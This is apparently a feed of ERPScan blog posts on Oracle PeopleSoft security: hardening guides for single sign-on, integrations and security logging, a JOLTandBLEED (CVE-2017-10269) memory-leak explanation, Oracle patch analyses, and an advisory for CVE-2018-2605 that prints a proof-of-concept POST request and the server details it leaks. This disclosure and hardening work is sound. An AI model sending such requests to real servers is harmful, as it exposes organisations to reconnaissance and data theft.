Various solutions may be used to create intersystem business processes. The trusted relationships or Single Sign-on (SSO) between PeopleSoft systems allow minimizing the authentication requirements. If the calling PeopleSoft system (Node) accepts the called system as trusted, the password won’t be required.

The biggest benefits of such interaction are that, firstly, passwords are not transmitted to the network, and secondly, a simple registration is available beyond the system boundaries. With this function in place, you may create a PeopleSoft portal consisting of various PeopleSoft applications (e.g. Campus Solutions, HCM, FSCM) where a user has an opportunity to navigate within a system of multiple applications after being once authenticated.

PeopleSoft-only Single Sign-on [EASSEC-PVAG-PS-28]

Description

Single sign-on is critical for PeopleSoft portal implementations because the portal integrates a content from various data sources and application servers and presents them in a unified interface.

After the first application server/node authenticates a user, the system delivers a web browser cookie containing an authentication token (PS_TOKEN). PeopleSoft uses web browser cookies to store a unique access token for each user after the initial authentication. When the user connects to another PeopleSoft application server/node, the second application server uses the token in the browser cookie (as long as the token is valid) to re-authenticate users automatically so they don’t have to sign in repeatedly.

The list of trusted nodes for the Financials system resides in the PSTRUSTNODES table. You configure the list using PeopleTools, Security Objects, Single Sign-on. There, trusted nodes are chosen and then added to Whitelist sites or allow Domain Compare in Web Profile to participate in single sign-on.

Furthermore, nodes have a two-authentication option of single sign-on:

• Password (the value you enter is limited to 88 characters) indicates that each node in the single sign-on configuration authenticates other nodes by “knowing” the password for each node.
• Certificate shows that a digital certificate authenticates each node in the single sign-on configuration.

Threat

1. PeopleSoft single sign-on functionality is also applied at the web server level. For example, imagine you have two web servers, server X and server Y. Assume that web server X is an SSL/TLS site while web server Y is not. In this case, many organizations want server Y to trust the authentication token, PS_TOKEN issued by server X. It requires PS_TOKEN to be set in order to be secure.
   If PS_TOKEN is not marked as secure, the browser sends PS_TOKEN to server Y over the unencrypted non-SSL/TLS link when a user signs in through server Y. This is a typical behavior for browsers when dealing with non-secure cookies. Potentially, a hacker could identify this token from the clear network and use it to sign on to SSL/TLS-secure server X.
2. If you use a password as an authentication option of single sign-on, especially in case of a short length password, an attacker can perform a TockenChpoken attack and gain full access to PeopleSoft.

Solution

To resolve this potential security issue, select the Secure Cookie with SSL check box on the Web Profile Configuration – Security page. You use this property to control the secure attribute of the single sign-on cookie. If you enable the property, and the scheme of the current request is HTTPS (SSL/TLS server), the system sets the secure attribute of the single sign-on cookie (PS_TOKEN) to true.

This prevents the single sign-on token from travelling over an insecure network. If you enable this property, you effectively disable single sign-on to any non-SSL/TLS servers. To prevent a TockenChpoken attack, it’s recommended to use digital certificate authentication when implementing single sign-on. It is configured in the Node Definitions page (PeopleTools >Portal > Node Definitions).

PeopleSoft integration with third-party systems via Integration Broker [EASSEC-PVAG-PS-29]

Description

PeopleSoft Integration Broker is a middleware technology that

• performs asynchronous and synchronous messaging among internal systems and third-party systems;
• exposes PeopleSoft business logic like web services to PeopleSoft and third-party systems;
• consumes and invokes web services from third-party and PeopleSoft systems.

PeopleSoft Integration Broker enables you to perform these integrations among internal systems and third-party integration partners, while managing data structure, data format and transport disparities.

Third-party systems is configured like PeopleSoft systems in Node Definitions page (PeopleTools > Portal > Node Definitions) and in the Gateways page (IB_GATEWAY) to update configuration settings and register target connectors to be used with the gateway.

The PeopleSoft delivered some default target connectors with properties:

• APNTargetConnector
• AS2TargetConnector
• ExampleTargetConnector
• SimpleFileTargetConnector
• FTPTargetConnector
• GetFileTargetConnector
• GetMailTargetConnector
• HttpTargetConnector
• JMSTargetConnector
• ApplicationMessagingTargetConnector
• PeopleSoftTargetConnector
• RIDCTargetConnector
• SFTPTargetConnector
• SMTPTargetConnector

Threat

The web services and integrations in your PeopleSoft applications can expose sensitive information including financial data. For example, security requirements might differ when interfacing with credit card processing vendors, versus publishing salary information out of human resources, versus synchronizing business units between applications, and so on. If authentication data of a user with access to a third-party system is compromised, an attacker will get access to the PeopleSoft system and perform critical actions with sensitive information via Service Operations.

Solution

A security analyst must evaluate security requirements for each individual integration. Review the list of connections with third-party systems and active nodes and define which of them you actually need. If the connection stores user authorization values, it is recommended to analyze the user. Properties of connectors is configured in the Gateways page (IB_GATEWAY). Node definitions, WS Security, and Routing Definitions with Service Operations are configured in Node Definitions page (PeopleTools >Portal > Node Definitions).

Remote PeopleSoft connections with DB [EASSEC-PVAG-PS-30]

Description

Data sources represent the location of the source data that is extracted, transformed, and loaded to the target. Remote data source data is extracted from a separate (remote) database and migrated into the local database. You must define remote database connections to source data from a database other than your local PeopleSoft database instance.

The Remote Database Access Management page enables you to define connectivity information for relational databases to be used for sourcing data for PeopleSoft Data Transformer. The Remote Database Access Management page (REMOTEDB) is used to define remote database connections.

Threat

If authentication data of a user with access to system is compromised, an attacker will get access to the remote database, because the local database stores data of the remote database: DB name, server, port, user ID, and password.

Solution

If you don’t require extracting remote data from a separate database and migrating into the local database, it is not recommended to use this functionality. If you access data from a local database, you do not need to set up remote database connections.

Further steps

In addition to mechanisms of an application server, servers are often connected with a number of other mechanisms. For example, Oracle Access Manager can be used as the single sign-on solution. It is used when you have Oracle applications and PeopleSoft applications in your organization and users who have been authenticated by the Oracle system can access PeopleSoft applications without being re-authenticated.

Further, the scope of such mechanisms includes any other possible methods to penetrate neighbour system employed in penetration tests, i.e. an attempt to enter the neighbor system with the same or similar passwords both at OS, RDBMS and application levels, as well as all kinds of search for passwords in plain text in the file system; update, integration, backup scripts, etc. All this should be checked to eliminate any risk of penetration with one weak link to all systems.

Stay tuned, as soon we will come back with the final critical area – Security events logging.

The post EAS-SEC. Oracle PeopleSoft security configuration. Part 9: Insecure trusted connections appeared first on ERPScan.

One of the most important aspects to ensure the PeopleSoft security is security event logging in place. In case of an incident (which is likely to happen since there are plenty of settings and it is difficult to control all of them), only the security audit that is configured correctly allows a company to discover the fact of an attack in due time and, perhaps, to respond to it. Besides, this security audit enables preventing cyberattacks in their early stages of collecting system data. If you collect events timely and analyze them with the help of techniques based on signature or machine learning for anomalies detection, you can both detect and prevent attacks quickly.

The security event logging system is complicated. It has a lot of different logs for each PeopleSoft component to store sensitive information. Taking into account all of the above, each component controls become vital. However, the control is not always centralized. For example, the password policies of WebLogic and PeopleSoft are configured separately as well as security event logging. This section contains four most critical logs.

Logging of table changes [EASSEC-PVAG-PS-31]

Description

In the PeopleSoft system there are three methods of data auditing:

1. Field Level Auditing is used when few fields needs to be audited in a record. The entire fields audit will be stored in a single record PSAUDIT.
2. Record Level Auditing allows you to have separate audit tables dedicated to one database record. It will be helpful to easily find the set of fields modified in a row in a particular record. It is also very useful when key fields might change itself due to the correction (Eg: Effdt in JOB).
   The Audit record should have the following fields:
   • AUDIT_OPRID
   • AUDIT_STAMP
   • AUDIT_ACTN
3. Database Level Auditing i.e. trigger-based auditing functionality is provided by PeopleTools Utilities as an alternative to the record-based auditing provided by Application Designer. This type of auditing is much better than record and/or field level auditing. It will audit changes made to any security table via Tools or any other mechanisms. Our record/field level auditing wouldn’t catch a change made via a SQL tool or COBOL, SQR, etc.

For Option 1 and 2, Audit captures changes of data for the online page. If the data is changed by any program using a SQL statement then Audit is not captured. As of Option 3, it covers both online and database changes of the transaction record.

Threat

With no direct table change logging, there is a risk of late or no response to potential unauthorized table data modifications, e.g. a malicious person may change the bank account value and commit fraud by money transfer to another account or change financial aid and student grades.

Solution

Best practise is to implement table change logging, especially Record level and Database level Audits.

Field Level Audit

Open the record definition and then Record Field Properties for any of the field for which Audit needs to be captured. In the Audit section, select the type of Action that needs to be audited.

For any change in the field, there will be multiple rows inserted in the Audit record.

Record Level Audit

Open the record definition and then Record Properties. You will find the section where you enter Audit Record Name and Type of Actions(Add/Delete/Selective/Change) which needs to be captured.

For any change done to the fields in the record, a row will be inserted into Audit record.

Database level Audit

There is navigation available in PIA to generate trigger script which is then executed in the database. This kind of Audit captures the changes done to the record at database level.

Audit record should start with AUDIT_XXX and should contain these fields as Key fields:

• AUDIT_OPRID — Captures Info on who changed the data;
• AUDIT_STAMP — Captures the TimeStamp;
• AUDIT_ACTN — Captures the Type of Transaction done (Insert/Delete/Update..);

Logging of PeopleSoft Integration Gateway activities [EASSEC-PVAG-PS-32]

Description

You can generate and view integration gateway logging data on on-demand basis for outbound requests in the Service Operations Monitor.

When on-demand logging is enabled in the Service Operations Monitor, the integration gateway creates log files corresponding to the transaction IDs of outbound requests, that is .html. Depending on the log level set, the standard integration gateway message log will also include the transactional message logging data. Data logged also contains the URL of the gateway performing the logging, including the transaction ID and IP address. If you have implemented inbound load balancing using virtual application server domains, this information will help you determine the gateway that is performing the logging.

Scroll through the integrationGateway.properties file until you find the logging section. The following line is sets the logging level (2 is the default):
ig.log.level=2

The logging levels are:

Threat

With no security event logging, there is a risk of late or no response to potential attacks on a gateway. The risk of a security breach is considerably increased by service vulnerabilities (e.g. CVE-2013-3821 and CVE-2017-3548) and exploits available on the Internet. It enables getting unauthorized access to the service and executing any OS commands.

Solution

To change Integration Gateway logging level, go to [PIA_HOME]\webserv\[DOMAIN]\applications\peoplesoft\PSIGW.war\WEB-INF directory and edit integrationGateway.properties in the logging section. Assign appropriate level of logging according with your company security policy. It’s recommended to use level 3.

Logging of HTTP access [EASSEC-PVAG-PS-33]

Description

In addition to logging and tracing options that PeopleTools provides, Web Server (WebSphere or WebLogic) offers a variety of tracing options. But HTTP access logging is configured in a particular web server in use.

Threat

If the security event registration is not maintained, there is a risk of delayed response (or its absence) to potential attacks with the HTTP protocol use. Most of the initial attacks to compromise the system are made by HTTP protocol such as SQL Injections, XSS, OS Command Injections and others. Forensic Investigations of an incident which are related to Internet attacks are almost impossible with these service logs disabled.

Solution

It’s recommended to enable HTTP logging in the particular Web Server.

WebLogic

To enable or disable HTTP access log:

1. Make sure the PIA server is running (WebLogic Server is starting).
2. Log on to the Administrative Console.
3. Open Server’s Logging configuration page.

• In the Domain Structure tree, expand Environment, and click Servers.
• Click PIA (or your custom server name) in the Servers list.
• Select the Logging tab, and select the HTTP tab.

• Click the Lock&Edit button.
• Select the HTTP access log file enabled check box to turn on the access.log.
• Modify the Log file name field if desired.
• Click Save and Activate Changes.

WebSphere

To enable HTTP access and error logging:

1. In the Administrative Console, select Servers, Server Types, WebSphere application servers, server1, and click the NCSA access and HTTP error logging link.
2. Enable HTTP access logging by selecting the options Enable logging service at server start-up and Enable access logging. The HTTP access logs will be written to PIA_HOME/webserv/profileName/logs/server1/http_access.log.
3. Enable HTTP error logging by selecting Enable error logging. The HTTP error logs will be written to PIA_HOME/webserv/profileName/logs/server1/http_error.log.

IDDA Logging [EASSEC-PVAG-PS-34]

Description

The PeopleSoft Instrumented Development Diagnostic Aid (IDDA) logger, enables gathering specific information about various areas within the PeopleSoft Internet Architecture and PeopleSoft Interaction Hub, including:

• PeopleSoft Internet Architecture processing;
• Integration Broker;
• Reporting, Report Repository;
• Portal;
• Caching;
• File processing;
• Security, authentication;
• Performance Monitor;
• WSRP;
• Jolt.

The IDDA functional categories are:

Threat

If the IDDA Logging is not maintained, there is a risk of delayed response (or its absence) to potential external attacks or internal fraud. An opportunity to carry out the Forensic Investigation after the fact of hacking is almost fully excluded, too.

Solution

To enable IDDA logging:

1. Select PeopleTools >Web Profile > Web Profile Configuration, and open the current web profile.
2. Select the Custom Properties page.
3. Add a new row, and enter these values:

Column	Value
Property Name	IDDA
Validation Type	Number
Property Value	The sum of the bit values of the functional area(s) you want to log. For example, if you wanted to log PIA (1) and Portal (8), you enter 9.

4. Click Save.
5. Restart the PeopleSoft site.

Further steps

After enabling four basic logs described above, implement the fine-tuned settings, e.g. detailed table lists with enabled table logging, details of security event logging in security audit logs, detailed event types in the PeopleSoft Integration Gateway log, etc. Also, their central collection and storage implementation should be accompanied with critical events analysis. Only then, you may add and analyze more detailed optional logs for each service, such as SYSAUDIT, Logging of PeopleSoft Process Scheduler Server events, etc.

The post EAS-SEC. Oracle PeopleSoft Security Configuration. Part 10: Logging of Security Events appeared first on ERPScan.

On November 15, 2017, Oracle published urgent critical updates related to JOLTandBLEED vulnerability (CVE 2017-10269). Today we released its proof of concept. As you remember, this vulnerability allows an attacker to gain full access to all data stored in the following ERP systems:

• Oracle PeopleSoft Campus Solutions
• Oracle PeopleSoft Human Capital Management
• Oracle PeopleSoft Financial Management
• Oracle PeopleSoft Supply Chain Management, etc.v

The root of the problem is how Jolt server handler (JSH) manages a packet with opcode 0x32. When using this flaw, the attacker can get access to an internal memory of Tuxedo middleware.

There is a jolt server handler (JSH) function called jsh_msgrcv that deals with messages processing inside the service. There, we can find two block codes with generating responses to a client’s invalid query.

The code that you see above is intended to do the following: by the error code, the “__gp_gets” function gets its text description. The “userlog” function records this message in the server log (TUXLOG). Then the “htoji” function packs the size of the generated message in a special way. A programmer supposed that the size of the message would be 0x40 (64) and 0x9c (156) bytes accordingly. However, it was “htoji” that packed data in a “big-endian” format, not in “ittleendian”, as a developer suggested. As a result, the parameters were 0x40000000 and 0x9c000000, that is 1073741824 and 2617245696 in the decimal notation. Further, these parameters are used as a size of transmitting data with “send” function, that consequently leads to the fact that we can read the internal memory of the application via network.

As you probably noted, there are two packages with 0x32 and 0x64 opcodes, and this issue occurs with their processing.

Please do not test this PoC on your production servers. Have a nice day.

Resources

• Download the PoC tool at Github
• Oracle Security Alert Advisory
• PeopleSoft JOLTandBLEED Vulnerability

The post JOLTandBLEED Details and PoC appeared first on ERPScan.

Today Oracle has released its quarterly patch update for January 2018. It fixes a total of 237 vulnerabilities.

The main highlights are as follows:

• The current CPU contains 153 vulnerabilities in Business-Critical Applications. It is 64% of the vulnerabilities found in other Oracle products.
• The highest CVSS 3.0 Base Score for vulnerabilities in Business Applications in this Critical Patch Update is 9.8 found in Fusion Middleware, PeopleSoft and Retail Applications (the overall highest CVSS score of 10.0 is in Sun ZFS Storage Appliance Kit ).
• The most vulnerable application is Oracle Financials totaling 34. However, not only the number but the criticality of issues is alarming. 13 of them can be exploited over the network without entering user credentials. The most critical vulnerability with CVSS 8.8.

Analysis of Oracle Critical Patch Update – January 2018

With this blog post, ERPScan Research and Security Intelligence teams provide an analysis of the most severe vulnerabilities closed by this Critical Patch Update.

This critical patch update contains slightly fewer security fixes than the previous CPU for October 2017 (see a bar chart below). A downward trend continues this month after a record-breaking 308-issue mark in CPU for July 2017.

However, an average number of patches keeps growing over years: an average number of fixes for 2015 was 153, for 2016 – 227, and for 2017 – 279.

Oracle vulnerabilities by application type

The patch updates deal with a wide range of products. The affected product families are listed below in a table by the number of closed issues in descending order.

As indicated by the pie chart, Financial Services Applications leads by the number of the closed issues.

Vulnerabilities in Oracle’s business-critical applications

The fact that Oracle has 110,000 applications customers from the wide range of industries, makes it of the utmost importance to apply the released security patches.

This quarter, Oracle CPU contains about 153 patches (64%) for vulnerabilities affecting a scope of the business applications, namely, PeopleSoft, E-Business Suite, Financial Services Applications, Fusion Middleware, Hospitality Applications, Supply Chain Products Suite, Retail Applications, Communications Applications, Health Sciences Applications, Database Server, JD Edwards Products, etc. 99 (almost 65%) of them can be exploited remotely without entering credentials.

Oracle PeopleSoft Security

Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial Management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate different business-critical information, depending on modules that are installed in an organization.

Between this and the previous CPUs, Oracle urgently closed severe issues including a vulnerability dubbed JoltandBleed (CVE 2017-10269). As you remember, this vulnerability allows an attacker to gain full access to all data stored in the following ERP systems:

• Oracle PeopleSoft Campus Solutions
• Oracle PeopleSoft Human Capital Management
• Oracle PeopleSoft Financial Management
• Oracle PeopleSoft Supply Chain Management, etc.

This quarter, the vendor released 15 fixes addressing the component. 8 of these security loopholes can be exploited over the network without requiring user credentials.

The highest CVSS score is 9.8.

In July 2017, Oracle patches grew dramatically and peaked at 30, and then slid slowly but steadily in the next two quarters.

Oracle E-Business Suite Security

Oracle E-Business Suite (EBS) is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate business-critical information, depending on modules installed in an organization.

This critical patch update contains 7 fixes for Oracle EBS. 4 of these security loopholes can be exploited over the network without requiring user credentials. The highest CVSS score is 9.1.

Since January 2017, the Oracle EBS fixes fell considerably, reaching a low of 11 in April 2017 and ended the last quarter of the passed year at 26. The patch update for January 2018 contains 7 Oracle EBS fixes like in April 2016.

Oracle vulnerabilities identified by ERPScan Research team

This quarter, 1 critical vulnerabilities discovered by ERPScan researchers were closed.

The details are provided below:

• Disclose PIA user and FQDN PeopleSoft server name (PSIGW/PeopleSoftListeningConnector) (CVSS base score 6.5, CVE-2018-2605). With disclosure in PSIGW/PeopleSoftListeningConnector attackers can get PIA user and FQDN PeopleSoft server name.

The most critical Oracle vulnerabilities closed by CPU January 2018

Oracle prepares Risk Matrices and associated documentation describing the conditions that are required to exploit a vulnerability, and the potential impact of a successful attack. The severity of the vulnerabilities is calculated via the Common Vulnerability Scoring System (CVSS ). This aims to help Oracle customers to fix the most critical issues first.

The most critical issues closed by the CPU are the following:

• Sun ZFS Storage Appliance Kit (AK) has CVE-2018-2611 (CVSS Base Score: 10.0) – Vulnerability in the Sun ZFS Storage Appliance Kit (AK) component of Oracle Sun Systems Products Suite (subcomponent: Core Services). The supported version that is affected is Prior to 8.7.13. The easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Sun ZFS Storage Appliance Kit (AK). While the vulnerability is in Sun ZFS Storage Appliance Kit (AK), attacks may significantly impact additional products. Successful attacks can result in takeover of Sun ZFS Storage Appliance Kit (AK).
• Oracle WebLogic Server has CVE-2017-10352 (CVSS Base Score: 10.0) – Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS – Web Services). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows an attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DoS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.
• Oracle Retail Convenience and Fuel POS Software has CVE-2017-5645 (CVSS Base Score: 10.0) – Vulnerability in the Oracle Retail Convenience and Fuel POS Software component of Oracle Retail Applications (subcomponent: OPT Server (Apache Log4j)). The supported version that is affected is 2.1.132. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Convenience and Fuel POS Software. Successful attacks of this vulnerability can result in takeover of Oracle Retail Convenience and Fuel POS Software.
• Oracle Directory Server Enterprise Edition has CVE-2017-5461 (CVSS Base Score: 9.9) – Vulnerability in the Oracle Directory Server Enterprise Edition component of Oracle Fusion Middleware (subcomponent: Admin Console (Sun Security Libraries)). The supported version that is affected is 11.1.1.7.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Directory Server Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Directory Server Enterprise Edition.
• PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil has CVE-2017-5645 (CVSS Base Score: 9.9) – Vulnerability in the PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil component of Oracle PeopleSoft Products (subcomponent: Supply Chain Portal Pack (Apache Log4j)). The supported version that is affected is 9.1. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil. Successful attacks can result in takeover of PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil.

Securing Oracle applications

It is highly recommended that organizations patch all those vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle Security assessment and Oracle Penetration testing services should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

The post Analyzing Oracle Security – Oracle Critical Patch Update January 2018 appeared first on ERPScan.

Application: Oracle PeopleSoft
Versions Affected: Oracle PeopleTools 8.54 – 8.56
Vendor: Oracle
Bugs: Information Disclosure
Reported: 15.06.2017
Vendor response: 16.06.2017
Date of Public Advisory: 17.01.2018
Reference: Oracle CPU January 2018
Authors: Dmitri Iudin aka @ret5et (ERPScan)

VULNERABILITY INFORMATION

Class: Information Disclosure
Risk: Medium
Impact: Sensitive data may be exposed to attackers
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-2605

CVSS Information

CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

VULNERABILITY DESCRIPTION

A remote unauthenticated attacker can get a PIA user and FQDN PeopleSoft server name via trivial POST request.

VULNERABLE PACKAGES

Oracle PeopleTools: 8.54
Oracle PeopleTools: 8.55
Oracle PeopleTools: 8.56

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU January 2018

TECHNICAL DESCRIPTION

Proof of Concept

POST http://<PEOPLESOFT_HOST>:8000/PSIGW/PeopleSoftListeningConnector
Content-Type: application/json

-- response --

200 OK
Date: Fri, 16 Jun 2017 11:34:07 GMT
Content-Length: 675
Content-Type: text/plain; charset=UTF-8
Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin <--!!! INFORMATION DISCLOSE
Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT)
Mime-Version: 1.0
Content-Type: multipart/related;
boundary="----=_Part_95_86951755.1497612847564"
Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message
------=_Part_95_86951755.1497612847564
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-Disposition: inline
Content-ID: IBInfo
<?xml version="1.0"?>2015810408Integration Gateway Error
------=_Part_95_86951755.1497612847564--

The post [ERPSCAN-18-001] Information Disclosure in PeopleSoft Listening Connector appeared first on ERPScan.

Today Oracle has released its quarterly patch update for October 2018. It fixes 301 vulnerabilities.

The main highlights are as follows:

• Oracle closed 1119 issues in 2018 in total that is the same as in 2017.
• CPU for October 2018 contains 162 vulnerabilities in business-critical applications.
• The most vulnerable application is Oracle Fusion Middleware totaling 65 security issues. Their criticality is also alarming since 86% of them can be exploited over the network without entering user credentials.
• This CPU contains 49 vulnerabilities assessed at critical (CVSS base score 9.0-10.0). The most severe vulnerability of the current CPU with the highest CVSS score of 10.0 is in the Oracle GoldenGate component.

Analysis of Oracle Critical Patch Update for October 2018

ERPScan Research and Security Intelligence teams provide an analysis of the vulnerabilities closed by this Critical Patch Update.

Comparing with the previous CPU for July 2018 that jumped over a 330-issue mark and became the largest ever, this month’s patch update addresses 10% less vulnerabilities, see a bar chart below.

Oracle fixes 1119 security issues in total in 2018. It is worth mentioning that this number rests the same as it was in 2017. The graph below illustrates the trend and the increasing number of patches released by Oracle for each year from 2013 to 2018.

Oracle vulnerabilities by application type

The patch updates touch a wide range of products. The affected product families are shown in a table and sorted in descending order of the closed issues.

As seen from the table and illustrated in a pie chart, Fusion Middleware leads by the number of the closed issues.

Vulnerabilities in Oracle’s business-critical applications

The fact that Oracle has 430,000 applications customers from the wide range of industries in 175 countries makes it of the utmost importance to apply the released security patches.

This quarter’s CPU contains 162 patches for vulnerabilities affecting a scope of the most crucial business applications from Oracle, namely, PeopleSoft, E-Business Suite, Fusion Middleware, Retail, JD Edwards, Siebel CRM, Financial Services, Hospitality Applications, Supply Chain. It’s 54% of vulnerabilities found in Oracle products this quarter.

125 of these security vulnerabilities can be exploited remotely without entering credentials.

Oracle PeopleSoft Security

Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial Management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate business information, depending on modules installed in an organization.

This quarter only, the vendor released 24 fixes (or 8% of the update) addressing this component, see a bar chart. 21 of them can be exploited over a network without requiring user credentials.

As seen from the graph, the number of vulnerabilities in PeopleSoft has fluctuated several times since October 2015 and raised from April to October 2018.

Oracle E-Business Suite Security

Oracle E-Business Suite (EBS) is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate different business critical information, depending on modules installed in an organization.

This critical patch update contains 16 fixes for Oracle EBS, and 14 of the vulnerabilities may be remotely exploitable without authentication. The highest CVSS score is 8.2.

The most critical Oracle vulnerabilities closed by CPU for October 2018

Oracle prepares Risk Matrices and associated documentation describing the conditions that are required to exploit a vulnerability, and the potential impact of a successful attack. The severity of the vulnerabilities is calculated via the Common Vulnerability Scoring System (CVSS ). This aims to help Oracle customers to fix the most critical issues first.

The most critical issues closed by the CPU are as follows:

• Oracle GoldenGate has CVE-2018-2913 (CVSS Base Score: 10.0) – a vulnerability in the Oracle GoldenGate component of Oracle GoldenGate (subcomponent: Monitoring Manager). Supported versions that are affected are 12.1.2.1.0, 12.2.0.2.0 and 12.3.0.1.0. The easily exploitable vulnerability allows an unauthenticated attacker with network access via TCP to compromise Oracle GoldenGate. While the vulnerability exists in Oracle GoldenGate, attacks may significantly impact additional products. Successful attacks can result in the takeover of Oracle GoldenGate.
• Java VM has CVE-2018-3259 (CVSS Base Score: 9.8) – a vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. The easily exploitable vulnerability allows an unauthenticated attacker with network access via multiple protocols to compromise Java VM. Successful attacks caused by this vulnerability can result in the takeover of Java VM.
• Oracle Big Data Discovery has CVE-2018-1275 (CVSS Base Score: 9.8) – a vulnerability in the Oracle Big Data Discovery component of Oracle Fusion Middleware (subcomponent: Data Processing (Spring Framework)). The supported version that is affected is 1.6.0. The easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Big Data Discovery. Successful attacks of this vulnerability can result in takeover of Oracle Big Data Discovery.
• JD Edwards EnterpriseOne Orchestrator has CVE-2018-7489 (CVSS Base Score: 9.8) – a vulnerability in the JD Edwards EnterpriseOne Orchestrator component of Oracle JD Edwards Products (subcomponent: IoT Orchestrator Security (jackson-databind)). The supported version that is affected is 9.2. The easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Orchestrator. Successful attacks of this vulnerability can result in the takeover of JD Edwards EnterpriseOne Orchestrator.
• MySQL Enterprise Monitor has CVE-2018-11776 (CVSS Base Score: 9.8) – Vulnerability in the MySQL Enterprise Monitor component of Oracle MySQL (subcomponent: Monitoring: General (Apache Struts 2)). Supported versions that are affected are 3.4.9.4237 and prior, 4.0.6.5281 and prior and 8.0.2.8191 and prior. The easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in the takeover of MySQL Enterprise Monitor.

Securing Oracle applications

It is highly recommended that organizations patch all those vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle Security assessment and Oracle Penetration testing services should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

The post Analyzing Oracle Security – Oracle Critical Patch Update for October 2018 appeared first on ERPScan.